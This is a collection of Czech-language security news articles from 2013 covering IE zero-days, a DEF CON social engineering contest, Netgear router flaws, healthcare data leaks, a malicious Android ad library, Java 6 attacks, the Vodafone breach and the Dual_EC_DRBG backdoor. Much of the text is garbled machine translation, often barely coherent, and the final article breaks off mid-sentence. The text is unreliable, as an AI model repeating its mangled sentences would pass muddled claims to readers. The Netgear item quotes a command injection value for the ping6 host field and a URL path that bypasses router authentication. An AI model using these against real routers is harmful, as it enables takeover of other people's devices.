Nový balík aktualizací, který Microsoft i tento týden, stejně jako každé druhé úterý v měsíci v rámci tzv. Patch Tuesday zpřístupnil uživatelům svých produktů, přináší hned několik zajímavostí. Osm záplat opravuje kritické chyby ve Windows a všech verzích webového prohlížeče Internet Explorer od IE6 až po IE11. Chyby v kancelářském balíku Office, Windows a platformě Lync, jež Microsoft zveřejnil minulý týden, opraveny bohužel nebudou – zatím však stále není jasné, zda budou opraveny nejnovější chyby v Internet Expoloreru, o nichž minulý týden přinesla informace společnost FireEye. Podle této bezpečnostní firmy jsou útoky s využitím nově objevených slabin IE prováděny z amerických webových stránek pomocí pokročilé techniky, jež vkládá škodlivý kód přímo do paměti a ohrožuje tak uživatele IE7, 8, 9 a 10 v operačních systémech Windows XP a Windows 7.
Podle FireEye byly útoky prováděny z webových stránek hostovaných ve Spojených státech a zaměřovaly se na lidi pracující v tamním zbrojním průmyslu. „Útočníci vložili zneužití nové chyby do velmi důležité webové stránky, o níž se ví, že ji navštěvují lidé zajímající se o národní a mezinárodní bezpečnostní politiku,“ napsali v neděli Ned Moran, Sai Omkar Vashisht, Mike Scott a Thoufique Haw z FireEye. Stránku však ve svém příspěvku nejmenovali. Podle nich jsou zločinci, kteří stojí za tímto novým útokem, zodpovědní také za průnik do systémů bezpečnostní společnosti Bit9, jež se odehrál dříve v tomto roce, a s největší pravděpodobností také podnikli za pomocí nové chyby v IE nedávné útoky na japonské cíle.
Kyberzločinci podle všeho využívají nejmodernější metody a techniky obdobné těm, jež podle společnosti Mandiant používala čínská hackerská skupina známá jako AP-1, která se zaměřuje zejména na americké cíle. Útoky zločinců běžně probíhají tak, že jsou jejich škodlivé kódy nainstalovány do počítače a spouští se stále znovu (dokud je někdo neodstraní) i po restartu zařízení. Ne tak nový červ zneužívající IE, jehož FireEye pojmenovalo jako Trojan.APT.9002. „Útočníci nahráli kód přímo do paměti bez zápisu na disk, což je technika, která se příliš nepoužívá. Bezpečnostní společnosti díky tomu budou mít problém za pomoci běžných forenzních metod vystopovat, odkud útočníci červy opravdu řídí.“
Útočníci se tak v tomto případě očividně rozhodli vyměnit možnost ovládání počítačů obětí po delší dobu za větší jistotu toho, že jejich identita zůstane skryta. Postup dále svědčí o tom, že jsou si jisti tím, že budou moci rychle získat kontrolu nad systémy obětí. Microsoft zatím na zjištění FireEye nereagoval a není tak jisté, kdy vydá pro svůj webový prohlížeč opravu.
velkých korporací selhání se bránit proti sociální inženýrství 6.11.2013 Hrozby
Roční sociální inženýrství Capture the Flag soutěž koná v DEF CON může zdát na povrchu být jen příležitostí pro testery pera a hackery, aby se prohnul jejich pretexting svaly. Ale pokud jste jedním z 10 hlavních technologií, výroby a kritické infrastruktury organizace, na něž letošních soutěžících, možná budete chtít přehodnotit, jak dobře vybavené váš personál je odvrátit záludný lidí.
Sociální inženýrství je pilířem a odrazovým můstkem pro téměř všechny cílové útoku, která byla zveřejněna. Hackeři hřeben sociálních médií stránky, on-line fóra, firemní adresáře a jinými zdroji inteligence dispozici hledají hrany, které jim pomohou dostat se přes přední dveře, nebo alespoň přes hranici sítě.
Konečný výsledek se pohybuje před krádeží identity, ke ztrátě dat zákazníka, ke ztrátě duševního vlastnictví nebo vojenské / vládní tajemství.
Letos tým 10 mužů utkali 10 žen, obrací své dovednosti proti takovým Apple, Boeing, Chevron, Exxon, General Dynamics, General Electric, General Motors, Home Depot, Johnson & Johnson a Walt Disney Corp., se zaměřením "flags", jako je učení, které internetový prohlížeč (s) je používán ve společnosti, informace o operačním systému, bezdrátový přístup k informacím, ať už virtuální privátní síť se používá vzdálených pracovníků a zda je na místě kavárna.
Soutěžící museli dva týdny na shromažďování Otevřít zdroj dat zpravodajské před DEF CON, s výjimkou návštěv na místě nebo pokusy o phishing, byli schopni používat pouze webové nástroje, aby připravila zprávu o svých cílů. A pak během DEF CON by konkurenti používají tato data během live-volání zasedání, které se konalo v průběhu ročního hackerské konferenci v Las Vegas.
"Co to bylo pozoruhodné bylo obrovské množství informací získaných během části OSI," řekl Chris Hadnagy, zakladatel sociální-Engineer.com a organizátor SECTF. "Dříve, měli bychom vidět několik zpráv s monster množství informací. Letos tam bylo neuvěřitelné množství informací. Jeden soutěžící našel Internetu přihlašovací stránky s odkazem na dokument nápovědy, které nevyžadovaly pověření. V tomto dokumentu vám dali příklad přihlášení s obrázkem IČ který pracoval a byli jsme schopni se přihlásit a podobné věci jsou šokující v roce 2013 vidět. "
Snad jako šokující je objem a kvalita informací vzdali u cílových organizací. Bez ohledu na oborová kategorie, ať už je to výroba, technologie, maloobchod, nebo energie, ropa a zemní plyn soutěžící byli schopni odejít s podrobnostmi o prohlížeči jsou používané v této společnosti, a číslo verze, to byl vrchol vlajka získat celé soutěž. Operační systém informací byl také vyhledávána a ulovil pro závodníky, jak bylo, zda VPN byl v použití.
"Společnosti jsou stále používáte prohlížeče jako IE 7, většina z nich jsou na IE 7. To je velký omyl, podle mého názoru, "řekl Hadnagy. "Jsou stále používáte zranitelnou prohlížeč a lidé byli ochotni dát, že informace se s cizími lidmi na telefonu. To otevírá je až do nepřeberné množství phishingu, telefonu a na místě zosobnění. "
Vědět takové informace, jako prohlížeč, operační systém, nebo dokonce VPN detaily může dát hacker míru důvěry na výzvu k vnitřní podpoře hledá přístup do systému.
Soutěžící byli také schopni získat informace, které by mohly umožnit fyzický přístup, jako je potravinářský průmysl používá organizace a zda je na místě kavárna, tyto dva údaje byly mezi prvními pěti nejvyhledávanějších a vzdali by kritické infrastruktury, jako je ropa a plynárenství.
"Jak těžké je získat t-shirt, ballcap nebo schránky pro společnost, která dělá stravovací služby? Kolikrát budete se zastavil provádění jídlo do budovy? Nikdo vás zastaví, "řekl Hadnagy. "Nemusíte firemní odznak být neviditelný. To vám otevře až zosobnění útoky. "
Podle bodového hodnocení za předpokladu, v soutěži, Apple dopadli nejhůře, následovaný General Motors, Home Depot, Johnson & Johnson a Chevron. Podrobnosti o konkrétních zranitelných oblastí nebyly zveřejněny, ale jsou k dispozici na vyžádání cílových společností, Hadnagy řekl.
"To je můj názor, ale většina informační školení nestojí za svou váhu," řekl Hadnagy. "Důkazem toho je, jak jsou jednoduché útoky provádějí proti společnostem s pravidelným školením povědomí o bezpečnosti."
Přesto, společnosti, které dělají provádět výcvik, nejsou to dělá pravidelně, podle shromážděných výsledků. Některé refresh méně než rok, zatímco jiní šli tak daleko, že přiznat se pretexters, že by to měl v nové zaměstnance orientaci a nikdy v následujících letech.
"Cílem pro nás pořádání této soutěže je zvýšit povědomí o sociální inženýrství jako hrozbu," Hadnagy a dodal, že by firmy měly zvážit sociálního inženýrství jako součást pravidelné penetračních testů. "Jsme svědky nárůstu sociálního inženýrství v pera testování, ale my nevidíme přijat mnoha velkých korporací."
Některé routery Netgear Otevřené pro vzdálenou autentizaci Bypass, Command Injection 6.11.2013 Zranitelnosti | Hrozby
Tam je chyba v některých Netgear bezdrátové směrovače, který umožňuje vzdálenému útočníkovi dovolit ohrozit kompletně zařízení a získat oprávnění uživatele root. Chyba je triviálně využitelné a badatel, který objevil zveřejnil proof-of-concept exploit.
Tato chyba zabezpečení je nástroj příkazového injekce vada, která v kombinaci se samostatným ověřování bypass chyba, že stejný výzkumník zjistil, můžete dát útočník jednoduchý root přístup zranitelných routerů. Chyba je v routeru Netgear WNDR3700v4 , domácí dvoupásmový gigabitový router a Zach Cutlip, badatel, který objevil chybu, že jeho zneužití může zneužít chybu, zakažte ověřování, otevřete Telnet server a potom obnovit router do původní stav, takže uživatel si neuvědomuje, co se stalo.
Tato chyba zabezpečení zahrnuje funkci nazvanou cmd_ping6 (), který je určen na ping nějaký daný název hostitele adresy IPv6. Nicméně chyba ve firmware umožňuje útočníkovi použít tuto funkci jako vektor ke kompromisu cílového směrovače a pak dělat, co se mu zachce. Chyba ovlivňuje verze 1.0.1.32 a 1.0.1.42 z routeru firmware.
"Co se tady děje, jak to tak často dělá, je hostitel řetězec dostane zkopírován do shellu příkazem na zásobníku pomocí sprintf (). To je pravděpodobně nejpřímější buffer overflow chyba, budete někdy vidět. Bohužel, neměli byste ji využít. Je to lákavé, kdo využívají, protože je tak čistý a jednoduchý, a proto objevovat kořen s nákladem MIPS ROP je sexy. Ale to by bylo hloupé, protože hned po ní je volání system (). Systém (systémy) Funkce propustí, co řetězec je dána k vyvolání / bin / sh. Jedná se o příkaz injekce zranitelnost ve své nejčistší podobě a je triviálně zneužít. Pokud je adresa řetězec, který je předán v něco jako "; evil_command, #", bude ping6 příkaz předčasně ukončit a evil_command bude provedena ihned po tom, "Cutlip, vedoucí výzkumný pracovník na zranitelnost Tactical Network Solutions, napsal ve svém vysvětlení Netgear vady .
Dříve Cutlip objevil a publikoval vysvětlení jiné zranitelnosti ve stejném routeru, který umožňuje útočníkovi obejít ověření funkce na routeru. Použití této chybě ve spojení s příkazového vstřikování zranitelnosti dává útočník silný způsob vlastnictví a zůstat rezidentní na Netgear routery.
"Pokud přejdete na http:// <router address> / BRS_02_genieHelp.html, budete moci obejít autentizaci pro všechny stránky v celé rozhraní pro správu. Ale nejen to, ověřování zůstává zakázána i po restartu. A samozřejmě, pokud vzdálená správa je zapnuta tato díla z Internetu frickin ', "řekl Cutlip vysvětlení chyby ověřování bypassu.
Exploit že Cutlip psal pro příkaz vstřikování zranitelnosti využívá autentizační problém stejně a dělá to docela jednoduché pro útočníka jít po zranitelné zařízení. Řekl, že když tam není žádná oprava k dispozici právě teď, nejlepší zmírnění postižených uživatelů je zakázat vzdálenou správu svých směrovačů.
"Vzdálená správa je hlavním útoku se podíváme a najít chyby v pro routery SOHO. Také se ujistěte, že je povoleno šifrování WPA2, a že nedůvěryhodné zařízení se nesmí připojit k síti, a to buď prostřednictvím kabelové nebo bezdrátové, "řekl Cutlip e-mailem.
Cutlip zmínil na Twitteru, že chyby, které našel byly také objeveny nezávisle jiný výzkumník Craig Young z Tripwire, který také našel vážnou chybu v zařízení ReadyNAS společnosti NETGEAR produktu.
Informace o pacientech v ohrožení
3.11.2013 Hrozby | Bezpečnost Ve zdravotnictví vznikají citlivá data, která je třeba chránit. Často se také mění právní normy, které určují jejich ochranu. Poskytovatelé péče se potýkají stejně jako firmy s úniky dat vzniklými ať již neopatrností pracovníků či cíleným působením kyberzločinců.
Data o pacientech, know-how a duševní vlastnictví jsou hlavními zdroji informací organizací zabývajících se zdravotní péčí. Potýkají se s výzvou, jak chránit data, a zároveň čelí stále výraznějším bezpečnostním hrozbám, měnícím se legislativním požadavkům, a to vše na pozadí snižování výdajů, počtu zaměstnanců a dalších organizačních změn.
Na základě celosvětového průzkumu společnosti Deloitte je možné přiblížit typy nejčastějších úniků dat ve zdravotnictví. V 71 procentech pocházejí z prostředí zdravotnických zařízení, 16 procent ze zdravotních pojišťoven a třináct procent od ostatních subjektů působících ve zdravotnictví.
Se stále rostoucím důrazem na ochranu dat respondenti přikládají větší význam řízení přístupu a kontrole identity. Odpovědi ukazují, že řízení přístupu je a nadále bude jejich hlavní prioritou. Tento trend je však patrný i v jiných odvětvích. Organizace chtějí poskytnout zaměstnancům a třetím stranám nástroje, které zajistí jejich vzdálený a bezpečný přístup k aplikacím a infrastruktuře.
Ztráta a únik informací plynoucí z nedostatečného řízení přístupu k informacím jsou problémy, které se jednoznačně týkají všech respondentů výzkumu. Únikem je chápán pohyb informačních aktiv z důvěryhodných zdrojů k nevhodným, nedovoleným či veřejným nositelům, což představuje potenciální riziko a negativní dopad pro organizaci.
Jedním ze způsobů, jak se chránit před únikem dat, je implementace systému DLP (Data Leakage Prevention), který pomáhá držet data ve správných rukách. Stále se však objevují případy, kdy poskytovatel zdravotní péče měl například nechráněný web, jenž obsahoval jména, adresy, telefonní čísla a laboratorní výsledky pacientů, což je v rozporu se zákonem. Tehdy je třeba rychle přijmout bezpečnostní opatření.
Únik informací sám o sobě může i nemusí způsobit společnosti újmu, ale obecně znamená, že došlo k porušení bezpečnostních podmínek, nedostatku povědomí o bezpečnosti či k jinému pochybení. Ačkoli má pouze malé procento respondentů výzkumu v současné době implementovanou technologii DLP – v porovnání s velkou skupinou používající firewally a antivirová řešení – je to technologie, na kterou se plánují v blízké době zaměřit. Vysoké náklady
Většina organizací (a to nejen v oblasti zdravotnictví) si DLP technologie osvojuje relativně pomalu. Hlavním důvodem jsou bezesporu vysoké náklady spojené s implementací tohoto řešení. Jejich obhajoba je mnohdy neřešitelným úkolem, protože zdravotnické organizace již investovaly do zabezpečení využívané infrastruktury. Nicméně při rozhodování o implementaci DLP hraje výraznou roli jeho pokrytí téměř všech zdrojů úniků dat.
Informační bezpečnost v oboru, jako je zdravotnictví, představuje základní stavební kámen, protože uchovávaná data patří mezi nejcitlivější. Pro zajištění potřebné úrovně ochrany dat tak nestačí formálně zdokumentovaná strategie informační bezpečnosti, protože jednou z nejčastějších příčin úniku je lidská chyba. Je proto nutné přijmout takové prvky ochrany (jako je například DLP), které omezují lidská pochybení.
Únik dat v organizacích zabývajících se zdravotní péčí bývá přičítán především nedostatečnému prosazování již exitujících právních předpisů, zvyšujícímu se podílu informačních technologií, všudypřítomnosti sociálních médií a potenciálu pro zpeněžení osobních zdravotních informací neoprávněnými uživateli.
Důsledky úniku dat mohou být pro organizaci velmi významné – poškození dobrého jména a peněžní sankce patří mezi ty, o kterých se nejvíce hovoří. Přesto většina zdravotnických organizací nedisponuje vhodnou ochranou, která by pomohla tomuto jednání zabránit, protože mají velmi omezené rozpočty na ochranu, monitorování a obnovu IT.
Real-time operační riziko a sledování dodržování 16.10.2013 Hrozby | Zabezpečení | Bezpečnost
Corvil oznámila v reálném čase pro všeobecné použití rizik a dodržování monitorovací řešení pro všechny druhy elektronických obchodních firem. Řešení sleduje a zachycuje všechny informace, které se přenáší na síťové vodiče s nulovým dopadem na plnění obchodních systémů a neměnností vyžaduje stávající software. Pomocí datové sítě drátěné, je schopen samostatně sledovat 100% všech aktivit uvnitř i ven z firmy zákazníka. To může sledovat objednávky uskutečněné a přijaté souhrnné výplní, včetně těch, které jsou neočekávané a neoprávněná. Corvil průběžně analyzuje drát dat, zjišťuje obchodních událostí a také sleduje stavu systému v reálném čase. Nadřízení jsou si vědomi hrozeb anomáliích, a chyby během několika vteřin. Corvil upozornění lze vkládat přímo do automatizovaných procesů, které mohou vymáhat limity pozic, zprávy sazeb v zabij přepínače nebo vyvažování zátěže. Typický CorvilNet nasazení může zachytit miliony obchodování souvisejících zpráv za sekundu, z odposlechů, agregační přepínače nebo i softwarové protokoly, a pak dekódovat, korelují, analyzovat a upozorňovat v reálném čase. Data mohou být uloženy pro historické analýzy a mohou být exportovány do externích systémů pomocí mnoha standardních rozhraní. Nejnovější verze CorvilNet přináší řadu nových funkcí, včetně živého aktualizaci obrazovky zobrazující přesně to, co se děje právě teď přes celý obchodní systém. Díky použití CorvilLens, plně integrovaný real-time sítě, aplikací a obchodně-specifické výhled je na jedné obrazovce. Nové oznámení na základě uživatelem definovaných událostí lze použít k omezení obchodování nebo upozornění pracovníků finančně ohrožujících událostí. Automatického zjišťování schopnosti a konfigurovatelný reporting okna snadnost integrace a probíhající operace.
HTTPS pracuje uživatelů se zlými úmysly
10.10.2013 Zabezpečení| Hrozby
Infikované webové stránky se objeví na internetu doslova každý den. Patří mezi ně osobní blogy na WordPress, který se nakazí během hmoty, automatizované útoky, a na stránkách hlavních médií, z nichž každý uživatel se zlými úmysly napadnout ručně po několika přípravných kroků. Všechny tyto zdroje doplnit arzenál tzv. "dopravní obchodníky" - Počítačoví zločinci, kteří přesměrování návštěvníků na infikované webové stránky na on-line zdrojů, jejich malware psaní klienty. Nakonec uživatel podezření, nic, se může stát obětí drive-by útok , a pokud prohlížeč uživatele nebo prohlížeče plug-iny mají potřebné chyby, bude malware stahovaného souboru a jsou instalovány na počítače oběti.
Společnost Kaspersky Lab má systém, který automaticky detekuje a navštíví infikované webové stránky za účelem sběru nebezpečného vzorku a zaslat jej na naší virové laboratoře pro výzkum. Aby bylo zajištěno, tento systém je nejúčinnější, pokud jde o detekci on-line hrozeb, jsou infikované webové stránky studovány virových analytiků. Díky přesnému a pozornosti ze forenzní zkoušející, jsou schopni určit, jak jsou zahájeny útoky, když uživatel navštíví webovou stránku.
Jednou, že forenzní zkoušející byl já. Jsem byl přidělen webové stránky, který byl příčinou obětí počítače stáhnout škodlivý software, a použil jsem volný HTTP ladění služby Fiddler a začal zkoumat jeho obsah. Za prvé, jsem se podívat se na webové stránky v stránkách, hledá pro některou z běžných příznaků web infekce, jako <script> a <iframe> značek, které by přesměrování návštěvníků na škodlivé webové zdroje. Nenašel jsem nic tagy, a to přišlo jako žádné překvapení, protože webové stránky hackeři zřídka nechat odkazy na malware venku. Pečlivě jsem zkoumal všechny soubory JavaScriptu na webových stránkách - ale nenašel jsem tam něco, a to buď. Tam bylo několik flash videa na internetových stránkách, které jsem věděl, že může být také použit ke stažení malware. Rozešla jsem je dolů a podíval se na každé z nich. Bohužel, nebylo ani stopy škodlivého kódu tam, a to buď. Takže co přesně se tady děje? Ověřil jsem si a znovu zkontrolovat tyto prvky, ale nemohl najít nic.
Moje pozornost pak se obrátil k nenápadné řetězce v Fiddler, který ukázal, že část obsahu stránek se stáhne přes šifrovaný kanál přes HTTPS.
Bylo těžké uvěřit, že uživatelé se zlými úmysly prošel nákladnou postup získání certifikátu SSL pro webové stránky, aby se šíření škodlivých programů, protože tyto stránky jsou umístěny na černých listinách podle antivirových společností a ztrácejí svou hodnotu velmi rychle. Ale jak Sherlock Holmes říká: " Odstraňte všechny další faktory, a ten, který zůstane, musí být pravda. "
Necítila jsem se příliš sebejistě, když jsem přešel na možnost Šumař dešifrovat komunikaci přes HTTPS. Ale jak se ukázalo, co původně vypadalo jako úplně obyčejný řetězec byl ve skutečnosti skrývá přesměrování na škodlivé webové stránky.
Stránky, které slouží jako zdroj škodlivého softwaru, stejně jako webové stránky, které sloužilo jako přesměrování zprostředkovatele s SSL certifikátem, oba byli přidány do naší databáze škodlivých zdrojů přímo na místě. Všechny malware, že oni byli rozšíření již dříve zjištěn a identifikován společností Kaspersky Lab.
Ale moje zvědavost vzbudil: jsou uživatelé se zlými úmysly opravdu nákup SSL certifikáty pro bezpečný přenos škodlivého kódu, nebo se nějak přišel na to, jak se dostat přes prohlížeč ověření pomocí falešné SSL certifikáty? Překvapující, jak to bylo, certifikát byl skutečný problém.
Poměrně často vidíme, uživatelům se zlými úmysly lovení na důvěře svých obětí -, že hack účtů na sociálních sítích, aby bylo možné posílat odkazy na dotyčné osoby přátele pod záminkou dalšího roztomilé kočičí videa (ale s příponou exe, a ne každý. padne za to), a znovu loga donucovacích orgánů nasazených s vyděrači Trojan a přesvědčit uživatele k zadání jejich čísla mobilního telefonu "v boji proti botnetů". Ale co víc, uživatelé se zlými úmysly také vynaložit nemalé úsilí, aby oklamat antivirových společností a nezávislých výzkumníků. Co se může zdát jako neškodné šedé řetězce v připojení HTTPS je jen jeden příklad z těchto typů taktiky, soupeří o důvěru odborníků v těchto technologií, které byly navrženy s cílem chránit uživatele před online sabotáži.
Nejmenovaný Android Mobile Ad Knihovna Poses rozsáhlých riziko 8.10.2013 Hrozby | Mobil
Populární Android mobilní reklamy knihovna k dispozici na Google Play lze použít pro sběr dat zařízení nebo spustit škodlivý kód, bezpečnostní výzkumníci objevili.
Nejvíce alarmující aspekt knihovny je, že téměř 2 procenta Android aplikací s více než 1 milion stažení ve službě Google Play používat konkrétní knihovny a ty aplikace byly staženy více než 200 milionů časy, vědci FireEye řekl včera.
Výzkumníci se nezveřejňuje jméno knihovny , ale řekl, že informovaly Google a knihovny prodejce, oba jsou údajně řešení situace.
Mobilní reklamní knihovny umožní aplikacím hostitelských reklamy, obecně sbírat IMEI a IMSI identifikátory zařízení. Avšak toto konkrétní knihovny, přezdívaný Vulna o FireEye, je daleko razantněji a schopné shromažďovat textové zprávy, kontakty a volání detaily, stejně jako mají schopnost spustit kód.
"Vulna [i] obsahuje řadu různých chyb," FireEye vědci. "Tyto chyby zabezpečení při využívány útočníkovi dovolit využít Vulna je riskantní a agresivní funkce provádět nebezpečné činnosti, jako je zapnutí fotoaparátu a fotografování bez vědomí uživatele, krást dvoufaktorová autentizace tokeny odeslané přes SMS, nebo otočením zařízení do části botnet. "
Jednou z chyb objevených FireEye je praxe převodu soukromou uživatelů informace ve formátu prostého textu přes protokol HTTP, který umožňuje útočníkovi zobrazit. To také používá HTTP pro příjem objednávek od svého velení a řízení serveru. "Útočník může převést Vulna do botnetu při napadání jeho provoz HTTP a slouží škodlivé příkazy a kód," uvádějí vědci.
K dispozici je také slabost Java ve způsobu, jakým využívá Androidu Webview která by mohla umožnit útočníkovi sloužit škodlivý javascript. Všechny z těchto podmínek, spolu s oprávněním daných tímto inzerátem knihovna, jako je kontrola nad fotoaparátem nebo přístup k SMS-mohl dát útočník řadu možností, jak rozjet phishingové útoky, zavolat do prémiového volání nebo SMS poplatků, nebo invazi do soukromí uživatele tím, že nelegální obrázky, krade hesla nebo prohlížení historie prohlížení.
Výzkumníci říkají, knihovna dává zařízení uživatele v ohrožení řadě využije, včetně man-in-the-middle útoky přes hotspoty veřejné Wi-Fi nebo dokonce DNS útokům na, přesměrování na zařízení mobilního prohlížeče útočník kontrolované místě.
Horší je, že činnosti knihovny je obtížné zjistit, protože příkazy, které obdrží od C & C serveru IBM Data Server použití kódovaných v polích záhlaví HTTP spíše než v těle odpovědi. Zdrojový kód je popletl stejně, vědci a dodal, že jeho chování je obtížné analyzovat.
"V jedné populární hře je Vulna provedena pouze v určitých místech ve hře, například při dosažení určité úrovně," uvádějí vědci s tím, že jakýkoli škodlivý chování se děje v pozadí pryč z dosahu uživatele.
FireEye varuje, že škodlivé reklamní knihovny jako Vulna jsou rostoucí hrozbou, a to zejména pro podniky, které umožňují osobní mobilní zařízení pro přístup k síťovým prostředkům.
"[Tato] ad knihovny jsou znepokojivě agresivní na shromažďování citlivých údajů uživatelů a vkládání schopnosti vykonat nebezpečné operace na požádání, a také obsahují různé třídy chyb, které umožňují útočníkům využít jejich agresivní chování poškodit uživatele," řekl FireEye. "App vývojáři pomocí těchto knihoven třetích stran často nejsou vědomi bezpečnostních otázkách v nich."
Útoky na nepodporovaný Java 6 jsou na vzestupu 13. září 2013. Zranitelnosti | Hrozba Jak předpovídal na konci roku 2012 a dokládá stále se rozšiřující použití exploit kity, zranitelnosti v populární a rozšířený software, jako je například Acrobat Reader Java a Adobe a Flash jsou na vrcholu seznamu z nejvíce využívány podvodníci z internetu.
Zero-da y chyby jsou menší problém, než ty staré - ve skutečnosti, vzhledem k tomu, že mnoho lidí stále používají starší, zranitelné softwarové verze softwaru, ovládat využije nulového dnů je prakticky zbytečné průměrného Cyber podvodník, který jde po penězích . A situace je asi dostat mnohem horší, říká, že Trend Micro Threat Communications Manager Christopher Budd. "Jsme svědky útoků zaměřených neopravených zranitelností v Javě 6, široce nasazen ale nikdo není podporována verze Javy. A my jsme svědky nárůst sofistikovanosti útoků s útočníky vykonávajících nižší úrovně útoky proti Layer Native Java, "řekl píše . Oracle ukončuje podporu Java 6 v únoru 2013, což znamená, že žádné další opravy zabezpečení. "Zatímco prodejce ukončení podpory a již poskytuje bezpečnostní opravy není nová věc, skutečnost, že více než 50% uživatelů se tam stále běží Java 6 je to bezprecedentní situace," řekl poukazuje. Po odhalení rozšířené aktivní využívání Java zero-day v lednu 2013, několik bezpečnostních expertů vyzývají uživatele, aby vypnutí Javy, pokud jej nepotřebujete. Několik měsíc dříve, Apple se rozhodl opustit aktualizaci Javy 7 k Oracle a odinstalovat svou Java applet plug-in ze všech webových prohlížečů (uživatelé mohou stáhnout poté od Oracle, pokud chtějí). Nicméně, stále ještě existují některé tři miliardy přístroje tam ještě v Javě, a více než polovina z nich běží na falešnou Java 6. "A teď jsme svědky první instance aktivních útoků proti této velké skupiny zranitelných cílů. Se JAVA_EXPLOIT.ABC útoku, jehož cílem CVE- 2013-2463 máme opravenou Java 7 zranitelnosti, které je unpatched na Java 6 a byl napaden. Zatímco útoky nejsou příliš rozšířeny ještě bylo začleněno do sady Exploit Neutrino což ukazuje na vysokou pravděpodobností rostoucí útoky proti této chybě zabezpečení "Budd sdílené s tím, že je to jen první" v tom, co je jistý, že probíhající série útoků proti neopravených zranitelností Java 6. " Naléhá, Java uživatelům buď zakázat, pokud to není nutné, nebo jej aktualizovat na nejnovější verze. Pokud žádná z těchto věcí jsou možné, měly by ostatní aktivní ochrany považovat. Také se obává, že s blížící se odchod do důchodu systému Windows XP , který je předpokládán i nadále používat o 33 procent uživatelů Windows v dubnu 2014 a je v současné době nejčastěji ohrožena verze operačního systému, bude toto sdružení potenciálních obětí ještě větší.
Hacker ukradl údaje o dvou miliónech zákazníků Vodafonu v Německu
13.9.2013 Incident | Hacking | Hrozby Neznámý hacker získal přístup na jeden ze serverů mobilního operátora Vodafone v Německu a ukradl osobní data o zhruba dvou miliónech zákazníků. Zástupci firmy to oznámili ve čtvrtek. Vodafone Deutschland, který je dceřinou společností britské Vodafone Group, má v Německu více než 32 miliónů zákazníků využívajících mobilní služby. Hacker se dostal ke jménům zákazníků, adresám a údajům o bankovních účtech. Hesla nebo bezpečnostní čísla ale nezískal. Podle společnosti není možné, že by mu údaje k něčemu mohly být.
„Tyto údaje lze stěží použít k získání přímého přístupu na bankovní účty dotčených klientů,” uvedla podle agentury Reuters společnost v prohlášení.
Útok provedl administrátor spolupracující firmy Zástupci Vodafonu Deutschland sdělili, že útok provedl administrátor počítačové sítě, který pracoval pro jinou společnost spolupracující s Vodafonem. Jeho totožnost ale zatím není známa, uvedla agentura AP.
Společnost na vyšetřování případu spolupracuje s policií. Také uzavřela cesty, kterými se hacker k jejím serverům dostal. Zákazníky přitom varovala, aby si dávali pozor na nevyžádané e-maily nebo telefonáty od lidí, kteří by mohli chtít ukradené údaje zneužít.
Vodafone Deutschland, který je dceřinou společností britské Vodafone Group, má v Německu více než 32 miliónů zákazníků využívajících mobilní služby.
Backdoored NIST odhalen, bude znovu k přezkoumání
12.9.2013 Hrozby | Zabezpečení | Zranitelnosti
Po minulém týdnu zjevení , že NSA, mimo jiné ovlivnila Americký národní institut pro standardy a technologie (NIST) přijmout standard šifrování, který byl učiněn NBÚ zahrnovat slabost znají jen oni, NYT neodhalil že dotyčná norma je NIST Special Publication 800-90.
Přijato organizace v roce 2006, byl standard zřejmě autorem téměř výhradně kryptografické odborníky NSA, a zahrnuje čtyři deterministický Náhodné Bit generátory, mezi nimiž je jeden tzv. Dual_EC_DRBG, který by měl vytvářet náhodná čísla klíče osiva šifrování, ale jak se ukázalo, náhodné Čísla produkuje mají malé zkreslení. To nepřijde jako šok pro odbornou cryptographer Bruce Schneier, ani jeho kolegové Dan Shumow a Niels Ferguson, který v roce 2007 publikoval výzkum popisovat chybu a teoretizování, že to je úmyslné zadní dveře.
Na čas byl Schneier zmateni tím, proč NSA byl tak neústupný, o zařazení tohoto generátoru v normě. "To nedává smysl jako poklop: Je to veřejná, a dosti zřejmé Nemá smysl z technického hlediska:. to příliš zpomalit pro každého, kdo dobrovolně používat, a to nedává smysl z hlediska kompatibility zpětně:. Výměna jednoho generátor náhodných čísel pro jiného je snadné, "poznamenal, a doporučil, aby nikdo používat. Podle New York Times, standardní byl nejen přijat NIST, ale podle Mezinárodní organizace pro normalizaci a Kanady Communications bezpečnostního establishmentu, stejně.
NIST reagovala na odhalení tím, že "by nebylo úmyslně oslabit šifrovací standard" a že by i nadále své poslání " pracovat s kryptografickým společenství vytvořit co nejsilnější šifrování normy pro americkou vládu a průmysl jako celek. " "NIST má za sebou dlouhou historii rozsáhlé spolupráce s předními světovými kryptografie odborníků na podporu robustní šifrování. National Security Agency (NSA) se podílí ve vývojovém NIST kryptografie procesu, protože jeho uznávanými odborníky. NIST je rovněž vyžadováno zákonem konzultovat s NSA, "jsou dále vysvětleny. Konečně, v gestu dobré vůle a doufá, že se znovu získat některé z důvěry, že ztratily z bezpečnostní komunity, se znovu otevřela veřejnosti komentář období pro zvláštní vydání 800-90A a návrhy odborných publikací 800-90B a 90C-800 tak, aby se veřejnost může prohlédnout a vyjádřit se k normě podruhé. "Pokud jsou nalezeny chyby v těchto nebo jiných NIST standardy, budeme pracovat s kryptografickým společenství řešit tak rychle, jak je to možné ", uzavírají.
SSL je rozbitá. No a co?
Hrozby | Zabezpečení | Šifrování
Je těžké ignorovat nejnovější zprávy o kampaních vláda sponzorovala internetových dozoru, které jsou údajně zapojit dešifrování protokolu SSL. Ve světle těchto zpráv, měli byste něco jinak? Záleží na tom, k vaší síti a jak? I když dnes jen malá skupina má k dispozici znalosti a zdroje k dešifrování SSL, je pravděpodobné, že toto tajemství bude unikat tak jako mnoho a zdroje nezbytné k uplatňování technik bude jen levnější a následně k dispozici dobře financované rad, jako je organizovaný zločin . Informace jednou dešifrovat mohou být také ohroženy jsou ohroženy kdo ohrožena organizace, která nyní drží data. Takže záleží na tom? Za prvé, já si nemyslím, že je "důkaz" v tomto okamžiku SSL samo o sobě bylo přerušeno. SSL a šifrovací algoritmy se jedná viděli mnoho implementačních problémů v minulosti, a to je správné předpokládat, že zlomená implementace, špatné generátory náhodných čísel a sub-optimální konfigurace činí prolomení "živou" SSL mnohem jednodušší, pak by mělo být založeno na síle základních algoritmů. Kromě toho, v mnoha význačných útoků, SSL nebyl problém. Koncový bod nebo SSL infrastruktura byla ohrožena místo a jako výsledek, šifrovací algoritmus nezáleží. Endpoint Security Žádný z "apt" úniku dat ve stylu měl hodně co do činění s dešifrování SSL. Místo toho, koncový bod ohrožena buď tím, že využívá technické zabezpečení v klientském softwaru, nebo pomocí techniky sociálního inženýrství oklamat uživatele do instalace škodlivého softwaru. Tyto techniky jsou staré, stále upravena a není omezen na sofistikované útoky. Každý den vidíme, kompromisy v rozmezí od "banálních" falešných UPS, e-mail na více 